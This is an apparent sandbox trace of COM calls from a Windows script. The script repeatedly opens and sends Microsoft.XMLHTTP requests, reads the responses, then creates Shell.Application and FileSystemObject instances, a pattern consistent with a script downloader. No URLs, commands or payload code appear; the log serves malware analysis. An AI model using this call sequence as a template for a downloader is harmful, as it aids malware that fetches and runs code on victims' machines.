	[0386.830] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0386.830] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0386.830] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0386.830] SysStringLen (param_1=0x0) returned 0x0
	[0386.830] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0386.831] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0386.831] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c74e0) returned 0x0
	[0386.831] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0386.831] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74e0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c08) returned 0x0
	[0386.831] ??2@YAPEAX_K@Z () returned 0x62f330
	[0386.831] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c08, pUnkSite=0x62f330) 
	[0386.831] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0386.831] XMLHTTPRequest:IUnknown:Release (This=0x49c5c08) returned 0x0
	[0386.831] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74e0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c74e0) returned 0x0
	[0386.831] XMLHTTPRequest:IUnknown:AddRef (This=0x49c74e0) returned 0x3
	[0386.831] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74e0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0386.831] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74e0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0386.831] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74e0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0386.831] longjmp () 
	[0386.831] longjmp () 
	[0386.831] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0386.831] SysStringLen (param_1=0x0) returned 0x0
	[0386.831] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0386.832] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0386.832] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7540) returned 0x0
	[0386.832] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0386.832] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7540, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7728) returned 0x0
	[0386.832] ??2@YAPEAX_K@Z () returned 0x62f310
	[0386.832] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7728, pUnkSite=0x62f310) 
	[0386.832] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0386.832] XMLHTTPRequest:IUnknown:Release (This=0x49c7728) returned 0x0
	[0386.832] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7540, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7540) returned 0x0
	[0386.832] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7540) returned 0x3
	[0386.832] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7540, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0386.832] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7540, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0386.832] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7540, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0386.832] longjmp () 
	[0386.832] longjmp () 
	[0386.832] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0386.832] SysStringLen (param_1=0x0) returned 0x0
	[0386.832] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0386.833] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0386.833] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5b50) returned 0x0
	[0386.833] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0386.833] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5bb8) returned 0x0
	[0386.833] ??2@YAPEAX_K@Z () returned 0x62f330
	[0386.833] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5bb8, pUnkSite=0x62f330) 
	[0386.833] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0386.833] XMLHTTPRequest:IUnknown:Release (This=0x49c5bb8) returned 0x0
	[0386.833] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5b50) returned 0x0
	[0386.833] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5b50) returned 0x3
	[0386.833] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0386.833] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b50, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0386.833] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0386.833] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0386.833] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b50, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0386.834] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0388.132] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0388.132] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b50, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0388.132] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0388.132] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0388.132] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b50, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0388.133] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0388.133] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0388.133] SysStringLen (param_1=0x0) returned 0x0
	[0388.133] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0388.133] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0388.133] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x396820) returned 0x0
	[0388.133] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0388.133] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396860) returned 0x0
	[0388.133] ??2@YAPEAX_K@Z () returned 0x62f350
	[0388.133] Shell:IObjectWithSite:SetSite (This=0x396860, pUnkSite=0x62f350) returned 0x0
	[0388.133] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0388.133] Shell:IUnknown:Release (This=0x396860) returned 0x1
	[0388.133] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x396820) returned 0x0
	[0388.133] Shell:IUnknown:AddRef (This=0x396820) returned 0x3
	[0388.133] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0388.133] SysStringLen (param_1=0x0) returned 0x0
	[0388.134] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f000) returned 0x0
	[0388.136] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0388.136] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f000, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f030) returned 0x0
	[0388.136] FileSystemObject:IUnknown:Release (This=0x45f000) returned 0x0
	[0388.136] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0388.136] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f030) returned 0x0
	[0388.136] FileSystemObject:IUnknown:AddRef (This=0x45f030) returned 0x3
	[0388.607] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0388.607] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b50, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0388.607] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0388.609] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0388.609] SysStringLen (param_1=0x0) returned 0x0
	[0388.609] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0388.609] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0388.609] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5b50) returned 0x0
	[0388.609] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0388.609] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c74e8) returned 0x0
	[0388.609] ??2@YAPEAX_K@Z () returned 0x62f330
	[0388.609] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c74e8, pUnkSite=0x62f330) 
	[0388.609] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0388.609] XMLHTTPRequest:IUnknown:Release (This=0x49c74e8) returned 0x0
	[0388.610] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5b50) returned 0x0
	[0388.610] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5b50) returned 0x3
	[0388.610] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
